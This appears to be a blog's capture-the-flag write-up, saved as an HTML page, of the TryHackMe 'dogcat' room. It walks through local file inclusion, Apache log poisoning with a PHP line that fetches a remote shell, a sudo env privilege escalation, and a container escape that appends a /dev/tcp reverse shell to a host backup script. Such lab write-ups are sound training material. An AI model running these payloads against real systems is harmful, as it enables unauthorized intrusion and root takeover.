
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">

    <title>dogcat | THM write-up</title>

    <link rel="icon" href="../../favicon.png" type="image/png">
    <link rel="canonical" href="../index.html">
    <meta name="referrer" content="no-referrer-when-downgrade">
    
    <meta property="og:site_name" content="fr33s0ul">
    <meta property="og:type" content="article">
    <meta property="og:title" content="dogcat | THM write-up">
    <meta property="og:description" content="Hello everyone, Today's CTF is very special made by Jammy a user in Tryhackme. Trust me even if this box is rated medium difficulty, You'll need to think a lot and be very patient. I guarantee you if you try hard in this challenge you'll learn a lot about LFI">
    <meta property="og:url" content="https://fr33s0ul.tech/dogcat-thm-write-up/">
    <meta property="og:image" content="https://fr33s0ul.tech/content/images/size/w1000/2020/04/dc.png">
    <meta property="article:published_time" content="2020-04-19T10:33:05.000Z">
    <meta property="article:modified_time" content="2020-04-19T11:19:18.000Z">
    <meta property="article:tag" content="CTF">
    
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="dogcat | THM write-up">
    <meta name="twitter:description" content="Hello everyone, Today's CTF is very special made by Jammy a user in Tryhackme. Trust me even if this box is rated medium difficulty, You'll need to think a lot and be very patient. I guarantee you if you try hard in this challenge you'll learn a lot about LFI">
    <meta name="twitter:url" content="https://fr33s0ul.tech/dogcat-thm-write-up/">
    <meta name="twitter:image" content="https://fr33s0ul.tech/content/images/size/w1000/2020/04/dc.png">
    <meta name="twitter:label1" content="Written by">
    <meta name="twitter:data1" content="fr33s0ul">
    <meta name="twitter:label2" content="Filed under">
    <meta name="twitter:data2" content="CTF">
    <meta name="twitter:site" content="@fr33soul_">
    <meta name="twitter:creator" content="@fr33soul_">
    <meta property="og:image:width" content="800">
    <meta property="og:image:height" content="548">
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "fr33s0ul",
        "url": "https://fr33s0ul.tech/",
        "logo": {
            "@type": "ImageObject",
            "url": "https://fr33s0ul.tech/content/images/size/w1000/2020/03/logo.gif",
            "width": 300,
            "height": 41
        }
    },
    "author": {
        "@type": "Person",
        "name": "fr33s0ul",
        "image": {
            "@type": "ImageObject",
            "url": "https://fr33s0ul.tech/content/images/size/w1000/2020/03/asdasd.gif",
            "width": 600,
            "height": 594
        },
        "url": "https://fr33s0ul.tech/author/fr33s0ul/",
        "sameAs": [
            "https://twitter.com/fr33soul_"
        ]
    },
    "headline": "dogcat | THM write-up",
    "url": "https://fr33s0ul.tech/dogcat-thm-write-up/",
    "datePublished": "2020-04-19T10:33:05.000Z",
    "dateModified": "2020-04-19T11:19:18.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "https://fr33s0ul.tech/content/images/size/w1000/2020/04/dc.png",
        "width": 800,
        "height": 548
    },
    "keywords": "CTF",
    "description": "Hello everyone, Today&#x27;s CTF is very special made by Jammy\n[https://tryhackme.com/p/jammy] a user in Tryhackme. Trust me even if this box\nis rated medium difficulty, You&#x27;ll need to think a lot and be very patient. I\nguarantee you if you try hard in this challenge you&#x27;ll learn a lot about LFI\n(local-file-inclusion), log poising, and containers escaping.\n\n&gt; Enumeration\nroot@kali:~# nmap -sC -sV 10.10.132.16\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 09:56 UTC\nNmap scan report for ip-10-1",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://fr33s0ul.tech/"
    }
}
    </script>

    <meta name="generator" content="Ghost 3.38">
    <link rel="alternate" type="application/rss+xml" title="fr33s0ul" href="../../rss/index.html">

    <style amp-custom>
    *,
    *::before,
    *::after {
        box-sizing: border-box;
    }

    html {
        overflow-x: hidden;
        overflow-y: scroll;
        font-size: 62.5%;
        -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    }

    body {
        min-height: 100vh;
        margin: 0;
        padding: 0;
        color: #3a4145;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        font-size: 1.7rem;
        line-height: 1.55em;
        font-weight: 400;
        font-style: normal;
        background: #fff;
        scroll-behavior: smooth;
        overflow-x: hidden;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
    }

    p,
    ul,
    ol,
    li,
    dl,
    dd,
    hr,
    pre,
    form,
    table,
    video,
    figure,
    figcaption,
    blockquote {
        margin: 0;
        padding: 0;
    }

    ul[class],
    ol[class] {
        padding: 0;
        list-style: none;
    }

    img {
        display: block;
        max-width: 100%;
    }

    input,
    button,
    select,
    textarea {
        font: inherit;
        -webkit-appearance: none;
    }

    fieldset {
        margin: 0;
        padding: 0;
        border: 0;
    }

    label {
        display: block;
        font-size: 0.9em;
        font-weight: 700;
    }

    hr {
        position: relative;
        display: block;
        width: 100%;
        height: 1px;
        border: 0;
        border-top: 1px solid currentcolor;
        opacity: 0.1;
    }

    ::selection {
        text-shadow: none;
        background: #cbeafb;
    }

    mark {
        background-color: #fdffb6;
    }

    small {
        font-size: 80%;
    }

    sub,
    sup {
        position: relative;
        font-size: 75%;
        line-height: 0;
        vertical-align: baseline;
    }
    sup {
        top: -0.5em;
    }
    sub {
        bottom: -0.25em;
    }

    ul li + li {
        margin-top: 0.6em;
    }

    a {
        color: #1292EE;
        text-decoration-skip-ink: auto;
    }

    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
        margin: 0;
        font-weight: 700;
        color: #121212;
        line-height: 1.4em;
    }

    h1 {
        font-size: 3.4rem;
        line-height: 1.1em;
    }

    h2 {
        font-size: 2.4rem;
        line-height: 1.2em;
    }

    h3 {
        font-size: 1.8rem;
    }

    h4 {
        font-size: 1.7rem;
    }

    h5 {
        font-size: 1.6rem;
    }

    h6 {
        font-size: 1.6rem;
    }

    amp-img {
        height: 100%;
        width: 100%;
        max-width: 100%;
        max-height: 100%;
    }

    amp-img img {
        object-fit: cover;
    }

    .page-header {
        padding: 50px 5vmin 30px;
        text-align: center;
        font-size: 2rem;
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }

    .page-header a {
        color: #121212;
        font-weight: 700;
        text-decoration: none;
        font-size: 1.6rem;
        letter-spacing: -0.1px;
    }

    .post {
        max-width: 680px;
        margin: 0 auto;
    }

    .post-header {
        margin: 0 5vmin 5vmin;
        text-align: center;
    }

    .post-meta {
        margin: 1rem 0 0 0;
        text-transform: uppercase;
        color: #738a94;
        font-weight: 500;
        font-size: 1.3rem;
    }

    .post-image {
        margin: 0 0 5vmin;
    }

    .post-image img {
        display: block;
        width: 100%;
        height: auto;
    }

    .post-content {
        padding: 0 5vmin;
    }

    .post-content > * + * {
        margin-top: 1.5em;
    }

    .post-content [id]:not(:first-child) {
        margin: 2em 0 0;
    }

    .post-content > [id] + * {
        margin-top: 1rem;
    }

    .post-content [id] + .kg-card,
    .post-content blockquote + .kg-card {
        margin-top: 40px;
    }

    .post-content > ul,
    .post-content > ol,
    .post-content > dl {
        padding-left: 1.9em;
    }

    .post-content hr {
        margin-top: 40px;
    }

    .post .post-content hr + * {
        margin-top: 40px;
    }

    .post-content amp-img {
        background-color: #f8f8f8;
    }

    .post-content blockquote {
        position: relative;
        font-style: italic;
    }

    .post-content blockquote::before {
        content: "";
        position: absolute;
        left: -1.5em;
        top: 0;
        bottom: 0;
        width: 0.3rem;
        background: #000;
    }

    .post-content :not(.kg-card):not([id]) + .kg-card {
        margin-top: 40px;
    }

    .post-content .kg-card + :not(.kg-card) {
        margin-top: 40px;
    }

    .kg-card figcaption {
        padding: 1.5rem 1.5rem 0;
        text-align: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.4em;
        opacity: 0.6;
    }

    .kg-card figcaption strong {
        color: rgba(0,0,0,0.8);
    }

    .post-content :not(pre) code {
        vertical-align: middle;
        padding: 0.15em 0.4em 0.15em;
        border: #e1eaef 1px solid;
        font-weight: 400;
        font-size: 0.9em;
        line-height: 1em;
        color: #dc0050;
        background: #f0f6f9;
        border-radius: 0.25em;
    }

    .post-content > pre {
        overflow: scroll;
        padding: 16px 20px;
        color: #fff;
        background: #1F2428;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0,0,0,.1), 0 0 1px rgba(0,0,0,.4);
    }

    .kg-embed-card {
        display: flex;
        flex-direction: column;
        align-items: center;
        width: 100%;
    }

    .kg-image-card img {
        margin: auto;
    }

    .kg-gallery-card + .kg-gallery-card {
        margin-top: 0.75em;
    }

    .kg-gallery-container {
        position: relative;
    }

    .kg-gallery-row {
        display: flex;
        flex-direction: row;
        justify-content: center;
    }

    .kg-gallery-image {
        width: 100%;
        height: 100%;
    }

    .kg-gallery-row:not(:first-of-type) {
        margin: 0.75em 0 0 0;
    }

    .kg-gallery-image:not(:first-of-type) {
        margin: 0 0 0 0.75em;
    }

    .kg-bookmark-card,
    .kg-bookmark-publisher {
        position: relative;
    }

    .kg-bookmark-container,
    .kg-bookmark-container:hover {
        display: flex;
        flex-wrap: wrap;
        flex-direction: row-reverse;
        color: currentColor;
        background: rgba(255,255,255,0.6);
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        text-decoration: none;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0, 0, 0, 0.1), 0 0 1px rgba(0, 0, 0, 0.4);
        overflow: hidden;
    }

    .kg-bookmark-content {
        flex-basis: 0;
        flex-grow: 999;
        padding: 20px;
        order: 1;
    }

    .kg-bookmark-title {
        font-weight: 600;
        font-size: 1.5rem;
        line-height: 1.3em;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        max-height: 45px;
        margin: 0.5em 0 0 0;
        font-size: 1.4rem;
        line-height: 1.55em;
        overflow: hidden;
        opacity: 0.8;
        -webkit-line-clamp: 2;
        -webkit-box-orient: vertical;
    }

    .kg-bookmark-metadata {
        margin-top: 20px;
    }

    .kg-bookmark-metadata {
        display: flex;
        align-items: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.3em;
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        -webkit-box-orient: vertical;
        -webkit-line-clamp: 2;
        overflow: hidden;
    }

    .kg-bookmark-metadata amp-img {
        width: 18px;
        height: 18px;
        max-width: 18px;
        max-height: 18px;
        margin-right: 10px;
    }

    .kg-bookmark-thumbnail {
        display: flex;
        flex-basis: 20rem;
        flex-grow: 1;
        justify-content: flex-end;
    }

    .kg-bookmark-thumbnail amp-img {
        max-height: 200px;
    }

    .kg-bookmark-author {
        white-space: nowrap;
        text-overflow: ellipsis;
        overflow: hidden;
    }

    .kg-bookmark-publisher::before {
        content: "•";
        margin: 0 .5em;
    }

    .kg-width-full.kg-card-hascaption {
        display: grid;
        grid-template-columns: inherit;
    }

    .post-content table {
        border-collapse: collapse;
        width: 100%;
    }

    .post-content th {
        padding: 0.5em 0.8em;
        text-align: left;
        font-size: .75em;
        text-transform: uppercase;
    }

    .post-content td {
        padding: 0.4em 0.7em;
    }

    .post-content tbody tr:nth-child(2n + 1) {
        background-color: rgba(0,0,0,0.1);
        padding: 1px;
    }

    .post-content tbody tr:nth-child(2n + 2) td:last-child {
        box-shadow:
            inset 1px 0 rgba(0,0,0,0.1),
            inset -1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:nth-child(2n + 2) td {
        box-shadow: inset 1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:last-child {
        border-bottom: 1px solid rgba(0,0,0,.1);
    }

    .page-footer {
        padding: 60px 5vmin;
        margin: 60px auto 0;
        text-align: center;
        background-color: #f8f8f8;
    }

    .page-footer h3 {
        margin: 0.5rem 0 0 0;
    }

    .page-footer p {
        max-width: 500px;
        margin: 1rem auto 1.5rem;
        font-size: 1.7rem;
        line-height: 1.5em;
        color: rgba(0,0,0,0.6)
    }

    .powered {
        display: inline-flex;
        align-items: center;
        margin: 30px 0 0;
        padding: 6px 9px 6px 6px;
        border: rgba(0,0,0,0.1) 1px solid;
        font-size: 12px;
        line-height: 12px;
        letter-spacing: -0.2px;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        font-weight: 500;
        color: #222;
        text-decoration: none;
        background: #fff;
        border-radius: 6px;
    }

    .powered svg {
        height: 16px;
        width: 16px;
        margin: 0 6px 0 0;
    }

    @media (max-width: 600px) {
        body {
            font-size: 1.6rem;
        }
        h1 {
            font-size: 3rem;
        }

        h2 {
            font-size: 2.2rem;
        }
    }

    @media (max-width: 400px) {
        h1 {
            font-size: 2.6rem;
            line-height: 1.15em;
        }
        h2 {
            font-size: 2rem;
            line-height: 1.2em;
        }
        h3 {
            font-size: 1.7rem;
        }
    }
    </style>

    <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
    <script async src="https://cdn.ampproject.org/v0.js"></script>

    <script async custom-element="amp-iframe" src="https://cdn.ampproject.org/v0/amp-iframe-0.1.js"></script>

</head>

<body class="amp-template">
    <header class="page-header">
        <a href="../../">
                <amp-img class="site-icon" src="https://fr33s0ul.tech/content/images/size/w1000/2020/04/download.png" width="50" height="50" layout="fixed"></amp-img>
        </a>
    </header>

    <main class="content" role="main">
        <article class="post">

            <header class="post-header">
                <h1 class="post-title">dogcat | THM write-up</h1>
                <section class="post-meta">
                    fr33s0ul -
                    <time class="post-date" datetime="2020-04-19">19 Apr 2020</time>
                </section>
            </header>
            <figure class="post-image">
                <amp-img src="https://fr33s0ul.tech/content/images/size/w1000/2020/04/dc.png" width="600" height="340" layout="responsive"></amp-img>
            </figure>
            <section class="post-content">

                <p>Hello everyone, Today's CTF is very special made by <strong><a href="https://tryhackme.com/p/jammy">Jammy</a></strong> a user in <strong>Tryhackme</strong>. Trust me even if this box is rated medium difficulty, You'll need to think a lot and be very patient. I guarantee you if you try hard in this challenge you'll learn a lot about LFI (local-file-inclusion), log poising, and containers escaping.</p><blockquote>Enumeration</blockquote><figure class="kg-card kg-code-card"><pre><code>root@kali:~# nmap -sC -sV 10.10.132.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 09:56 UTC
Nmap scan report for ip-10-10-132-16.eu-west-1.compute.internal (10.10.132.16)
Host is up (0.00091s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
MAC Address: 02:34:7F:5C:5A:88 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.01 seconds
root@kali:~#</code></pre><figcaption>After doing some enumeration with nmap, there's two port open <strong>SSH</strong> on 22 and <strong>HTTP</strong> on 80</figcaption></figure><figure class="kg-card kg-code-card"><pre><code>root@kali:~/dirsearch# ./dirsearch.py -u http://10.10.132.16/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt --extensions-list

 _|. _ _  _  _  _ _|_    v0.3.9                                                     
(_||| _) (/_(_|| (_| )                                                              
                                                                                    
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 220521                                                          

Error Log: /root/dirsearch/logs/errors-20-04-18_10-02-52.log

Target: http://10.10.132.16/                                                        
                                                                                    
[10:02:52] Starting: 
[10:02:52] 200 -  418B  - /
[10:02:57] 301 -  311B  - /cats  -&gt;  http://10.10.132.16/cats/
[10:03:00] 301 -  311B  - /dogs  -&gt;  http://10.10.132.16/dogs/
[10:05:19] 403 -  277B  - /server-status                                    
                                                                                
Task Completed</code></pre><figcaption>ran some directory enum, nothing special just 10 dog pictures in <strong>dogs/</strong> and 10 cat pictures <strong>cats/</strong> folders</figcaption></figure><p>visiting the frontend we can see those pictures from the folders being called randomly every time you click cat or dog.</p><figure class="kg-card kg-image-card"></figure><figure class="kg-card kg-image-card"></figure><p>we can see that ?view= is taking care of calling the php files to execute the function that will show us at the end the doggies or kitties, what if we like dogs and cats. Nope!, doesn't like it and we get nothing. well technically not nothing, we get an error that tells us that it fails d to open the file because it doesn't exist. anything we add to view it adds to it .php at the end and if it does exist in the folder <strong>/var/www/html/</strong> it will call it if not, it will show the error again.</p><figure class="kg-card kg-image-card"></figure><figure class="kg-card kg-image-card"></figure><figure class="kg-card kg-image-card kg-card-hascaption"><figcaption>and we have access to <strong>/etc/passwd</strong> we can see the users we have</figcaption></figure><p>the next thing we can do some log poisoning, If you are not familiar with log poisoning, I suggest visiting this link and read the article before moving forward.</p><figure class="kg-card kg-embed-card"><blockquote class="wp-embedded-content"><a href="https://www.hackingarticles.in/apache-log-poisoning-through-lfi/">Apache Log Poisoning through LFI</a></blockquote>
<amp-iframe sandbox="allow-scripts" src="https://www.hackingarticles.in/apache-log-poisoning-through-lfi/embed/" width="600" height="338" title="“Apache Log Poisoning through LFI” — Hacking Articles" frameborder="0" class="wp-embedded-content" layout="responsive"></amp-iframe></figure><figure class="kg-card kg-image-card kg-card-hascaption"><figcaption>&lt;?php file_put_contents('shell.php', file_get_contents('http://[your-host]/shell.php'))?&gt;</figcaption></figure><figure class="kg-card kg-image-card"></figure><pre><code>root@kali:~/php-reverse-shell-1.0# python -m SimpleHTTPServer 8083
Serving HTTP on 0.0.0.0 port 8083 ...
10.10.67.111 - - [19/Apr/2020 08:43:17] "GET /rev.php HTTP/1.0" 200 -
</code></pre><figure class="kg-card kg-code-card"><pre><code>root@kali:~# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.179.59] from (UNKNOWN) [10.10.67.111] 46238
Linux 4457cb6e9a51 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 GNU/Linux
 08:44:38 up 10 min,  0 users,  load average: 0.00, 0.04, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ sudo -l
Matching Defaults entries for www-data on 4457cb6e9a51:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 4457cb6e9a51:
    (root) NOPASSWD: /usr/bin/env
$</code></pre><figcaption>And we are user www-data, You can get the flags 1, 2, and 3. Notice that the user can run /usr/bin/env as root without password, we'll priv esc using that</figcaption></figure><figure class="kg-card kg-code-card"><pre><code>find / -type f -name flag4* 2&gt;/dev/null</code></pre><figcaption>tried to search for flag4, but there's no sign</figcaption></figure><figure class="kg-card kg-code-card"><pre><code>$ sudo /usr/bin/env /bin/sh -p
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
pwd
/root
hostname
4457cb6e9a51


</code></pre><figcaption>enumerating more our user figured out that we are in a docker container.</figcaption></figure><blockquote>Escaping the container</blockquote><p>I will leave an article that can give you an idea about containers escaping and how it can be very useful in a lot of cases for pentester.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.bleepingcomputer.com/news/security/escaping-containers-to-execute-commands-on-play-with-docker-servers/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Escaping Containers to Execute Commands on Play with Docker Servers</div><div class="kg-bookmark-description">Improperly secured privileged containers on the Play with Docker testing platform offered security researchers a way to escape Linux containers and run arbitrary code on the host system.</div><div class="kg-bookmark-metadata"><amp-img class="kg-bookmark-icon" src="https://www.bleepstatic.com/favicon/bleeping.ico" width="32" height="32" layout="fixed"></amp-img><span class="kg-bookmark-author">Ionut Ilascu</span><span class="kg-bookmark-publisher">BleepingComputer.com</span></div></div><div class="kg-bookmark-thumbnail"><amp-img src="https://www.bleepstatic.com/content/posts/2019/01/14/PleywithDocker_logo.png" width="1280" height="430" layout="responsive"></amp-img></div></a></figure><figure class="kg-card kg-code-card"><pre><code>cd /opt
ls
backups
cd backups
ls
backup.sh
backup.tar
cat backup.sh   
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container

</code></pre><figcaption>we have a backup.sh that runs every minute, taking the backup.tar to <strong>/root/container </strong>adding a reverse shell to the backup script may give us access to the host root. Since it interacts with the host root folders, the backup.sh is probably created by the host and ran by the host</figcaption></figure><pre><code>pwd 
/opt/backups
ls  
backup.sh
backup.tar
echo 'bash -i &gt;&amp; /dev/tcp/10.10.179.59/7263 0&gt;&amp;1' &gt;&gt; backup.sh

</code></pre><pre><code>root@kali:~# nc -lvnp 7263
listening on [any] 7263 ...
connect to [10.10.179.59] from (UNKNOWN) [10.10.67.111] 53868
bash: cannot set terminal process group (4298): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@dogcat:~# ls
ls
container
flag4.txt
root@dogcat:~#</code></pre><p>And we are root user at the host dogcat. Honestly, I learned a lot from this challenge I hope you found this write-up useful, feel free to leave a comment.</p><p>Happy Hacking!</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://tryhackme.com/room/dogcat"><div class="kg-bookmark-content"><div class="kg-bookmark-title">TryHackMe | dogcat</div><div class="kg-bookmark-description">I made a website where you can look at pictures of dogs and/or cats!</div><div class="kg-bookmark-metadata"><amp-img class="kg-bookmark-icon" src="https://tryhackme.com/img/favicon.png" width="552" height="564" layout="responsive"></amp-img><span class="kg-bookmark-publisher">TryHackMe</span></div></div><div class="kg-bookmark-thumbnail"></div></a></figure>

            </section>

        </article>
    </main>
    <footer class="page-footer">
            <amp-img class="site-icon" src="https://fr33s0ul.tech/content/images/size/w1000/2020/04/download.png" width="50" height="50" layout="fixed"></amp-img>
        <h3>fr33s0ul</h3>
            <p>Cybersecurity, Technology, and CTFs</p>
        <p><a href="../../">Read more posts →</a></p>
        <a class="powered" href="https://ghost.org" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 156 156"><g fill="none" fill-rule="evenodd"><rect fill="#15212B" width="156" height="156" rx="27"></rect><g transform="translate(36 36)" fill="#F6F8FA"><path d="M0 71.007A4.004 4.004 0 014 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0130 84H4a4 4 0 01-4-4.007v-8.986zM50 71.007A4.004 4.004 0 0154 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0180 84H54a4 4 0 01-4-4.007v-8.986z"></path><rect y="34" width="84" height="17" rx="4"></rect><path d="M0 4.007A4.007 4.007 0 014.007 0h41.986A4.003 4.003 0 0150 4.007v8.986A4.007 4.007 0 0145.993 17H4.007A4.003 4.003 0 010 12.993V4.007z"></path><rect x="67" width="17" height="17" rx="4"></rect></g></g></svg> Published with Ghost</a>
    </footer>
    
</body>
